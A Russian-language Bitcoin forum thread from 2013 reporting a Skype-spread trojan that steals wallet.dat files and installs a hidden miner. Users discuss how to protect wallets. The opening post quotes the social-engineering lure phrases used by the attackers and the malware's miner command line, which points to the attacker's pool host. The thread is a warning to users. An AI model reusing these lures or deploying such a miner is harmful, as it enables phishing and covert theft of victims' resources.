Перейти к содержимому


Фотография

Рассылка по Skype трояна, ворующего Bitcoin

Skype троян троян Bitcoin вирус Bitcoin

  • Авторизуйтесь для ответа в теме
Сообщений в теме: 15

#1 polym0rph

polym0rph

    Администратор

  • Администраторы
  • 6206 сообщений

Отправлено 07 April 2013 - 14:58

04 апреля Лаборатория Касперского сообщила, что обнаружила трояна, который распространяется через Skype рассылкой сообщений типа

- Я не могу спать после увиденного: http://www.goo.gl/XXXXX?image=IMG0540250-JPG
- Что ты думаешь об этой картинке, которую я отредактировал http://www.goo.gl/XXXXX?image=IMG0540250-JPG

 Вот еще список фраз, которыми пользуются злоумышленники, применяя навыки социальной инженерии:
hahaha
Is this you?
Picture of you?
Tell me what you think of this picture
This is the funniest picture ever!
I cant believe I still have this picture
Someone showed me your picture
Your photo isn't really that great
I love your picture!
What do you think of my new hair?
You look so beautiful on this picture
You should take a look at this picture
Take a look at my new picture please
What you think of this picture?
Should I upload this picture on facebook?
Someone told me it's your picture

Сервис сокравщения ссылок Goo.gl показывает, что на данный момент было уже более 170k кликов по этой ссылке, а час назад было 160k, то есть в среднем это 10k кликов в час или 2ю7 клика каждую секунду!
 
Сам троян ворует wallet.dat и подключает компьютер к ботнету, управляющемся по IRC. Сам троян написан на VB, тело трояна можно найтипо этому пути:

C:\Users\s\Desktop\Must Use Different Name\HqwKH\avivah.vbp
 
Больше всего заражений пришлось на Россию и Украину.
 
208194207.png

 

С следующем сообщении уже говорится о другом трояне, который также рассылается аналогичным способом через Skype.

 

Он запускает на компьютере жертвы майнер, который зарабатывает на счет злоумышленника. Приведена команда запуска:

bitcoin-miner.exe -a 60 -l no -o http://suppp.cantvenlinea.biz:1942/ -u XXXXXX0000001@gmail.com -p XXXXXXXX

 

Мораль сей басни: ответственнее относитесь к безопасности на своем компьютере и помните, что за сохранность своих средств в Bitcoin  отвечаете только вы сами.


  • 1

Правила форума.  Тема для вопросов новичков, если не нашли подходящую ветку форума.

Участвуйте в жизни сообщества, участвуйте в краудньюсинге!
Bitcoin адрес для пожертвований на развитие Bits.media: 1BQ9qza7fn9snSCyJQB3ZcN46biBtkt4ee


#2 Razore

Razore

    Пользователь

  • Пользователи
  • PipPip
  • 387 сообщений

Отправлено 07 April 2013 - 15:13

если кошель зашифрован это поможет?


  • 0

#3 Егор

Егор

    Пользователь

  • Пользователи
  • PipPip
  • 342 сообщений
  • ГородОблако Оорта

Отправлено 07 April 2013 - 15:35

поможет , пока ключ не подберут... :ph34r:


  • 0

сидим на Земле ,фигней маемся(хеши считаем) а могли бы покорять другие планеты ...


#4 Нуб

Нуб

    Пользователь

  • Пользователи
  • PipPip
  • 139 сообщений

Отправлено 07 April 2013 - 16:09

Я так понимаю достаточно добавить строчку suppp.cantvenlinea.biz 127.0.0.1 в host файл в виндовс и небеспокоиться.


  • 1

˙ʁɔʚ и ɯоʚ ʎɓʎƍ ʁ qɯɐҺvоw ʁнɓ ǝɯǝʚɔ иdu ņонҺон ǝwqɯ оʚ


#5 polym0rph

polym0rph

    Администратор

  • Администраторы
  • 6206 сообщений

Отправлено 07 April 2013 - 16:34

если кошель зашифрован это поможет?

Да, если троян тупой. А так никто не мешает злоумышленнику в троян внедрить кейлоггер, который считает все, что вводится с клавиатуры, и таким образом получить пароль. Некоторые товарищи из-за этого свои пароли вводят мышкой с помощью экранной клавиатуры. На что зловредописатели стали делать снимки экрана периодические или по какому-то триггеру. Короче, война технологий.

 

Я рекомендую кошелек вообще держать на отдельном компьютере, или, хотя бы, виртуалке, как описано в статье про безопасное хранение кошелька.


  • 0

Правила форума.  Тема для вопросов новичков, если не нашли подходящую ветку форума.

Участвуйте в жизни сообщества, участвуйте в краудньюсинге!
Bitcoin адрес для пожертвований на развитие Bits.media: 1BQ9qza7fn9snSCyJQB3ZcN46biBtkt4ee


#6 Shadov_v

Shadov_v

    Пользователь

  • Пользователи
  • PipPip
  • 82 сообщений

Отправлено 07 April 2013 - 17:05

 держать на отдельном компьютере, 

Отдельном от чего?  :)


  • 0

#7 Extendz

Extendz

    Новичок

  • Пользователи
  • Pip
  • 4 сообщений

Отправлено 07 April 2013 - 17:06

Отдельном от чего?  :)

Отдельном от основного, я полагаю.


  • 0

#8 polym0rph

polym0rph

    Администратор

  • Администраторы
  • 6206 сообщений

Отправлено 07 April 2013 - 17:17

Extendz,

Да, правильно. Почему-то у бухгалтеров не возникает идеи держать систему банк-клиент на компьютере где серфят в сети, играют в игрушки, качают торренты  и т.п., а народ у нас спокойно держит кошельки с приличными суммами.


  • 0

Правила форума.  Тема для вопросов новичков, если не нашли подходящую ветку форума.

Участвуйте в жизни сообщества, участвуйте в краудньюсинге!
Bitcoin адрес для пожертвований на развитие Bits.media: 1BQ9qza7fn9snSCyJQB3ZcN46biBtkt4ee


#9 Shadov_v

Shadov_v

    Пользователь

  • Пользователи
  • PipPip
  • 82 сообщений

Отправлено 07 April 2013 - 18:06

Меня неправильно поняли маленько, я имел ввиду, что вообще лучше от инета отрубиться совсем. Шутканул, так сказать, неудачно... :-(


  • 0

#10 Pingui

Pingui

    Неизлечимый перфекционист

  • Пользователи
  • PipPipPip
  • 950 сообщений

Отправлено 08 April 2013 - 23:02

Хм... При клике по подобной ссылке скайп сам скачивает и запускает файл? Или используются уязвимости браузеров?


  • 0

#11 u2u

u2u

    Новичок

  • Пользователи
  • Pip
  • 2 сообщений

Отправлено 09 April 2013 - 13:53

Диву дался когда прочитал, сори что вешаю ссылки...думаю не удалят....мне интересны мысли пользователей

http://respublika-kz.../society/29727/

http://www.securelis...obraznaya_ataka

http://www.securelis...bychi_bitkoinov


  • -1

#12 u2u

u2u

    Новичок

  • Пользователи
  • Pip
  • 2 сообщений

Отправлено 09 April 2013 - 14:03

В статье лаб каспера дает интересные данные....кто то усердно разными способами, с 1 марта закидывает майнера на компы жертв-отсюда + ЖИРНЫЙ к общему росту....вообщем голова есть --выводы за Вами...мне будет интересно



1 ссылка с инфосайта

2 с сайта касперыча хрыча


  • 0

#13 AndreyP

AndreyP

    Новичок

  • Пользователи
  • Pip
  • 22 сообщений

Отправлено 09 April 2013 - 17:47

А не является ли только это, распространение вируса-майнера нашим долгожданным и таинственным  " ASIC  майнером"  который сложность сети до небес повышает ? .  Радует   это лохотронщиков,  которые якобы вот вот уже  с ноября 2012 каждую неделю  обещают  начинать отгрузку несуществующего  ASIC продукта  ? 

Кто-нибудь видел кого-нибудь , кто видел   ASIC  майнера :D  ?


Сообщение отредактировал Nirton: 09 April 2013 - 22:26

  • 0

#14 Selefior

Selefior

    Пользователь

  • Пользователи
  • PipPip
  • 116 сообщений

Отправлено 09 April 2013 - 18:56

Ну про кражу кошелька тред тут 

 

Ну а второе - обычный ботнет, он был, есть и будет. 


  • 0

#15 Shambler

Shambler

    Продвинутый пользователь

  • Bits.media Team
  • PipPipPip
  • 2190 сообщений
  • ГородРостов-на-Дону

Отправлено 09 April 2013 - 19:16

"А скайп не нужен, родной"


  • 3

Прежде чем задавать вопрос прочти ТЕМУ ДЛЯ НОВИЧКОВ


#16 Ogame

Ogame

    Новичок

  • Пользователи
  • Pip
  • 9 сообщений
  • ГородЕнотоград

Отправлено 23 May 2013 - 16:03

Ужс. Не думал, что bitcoin настолько распространен и актуален, что его воруют.

Я думал это больше дорогое хобби "кто рукастее" и баловство у кого железо мощнее)


  • 0

s.gif





Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных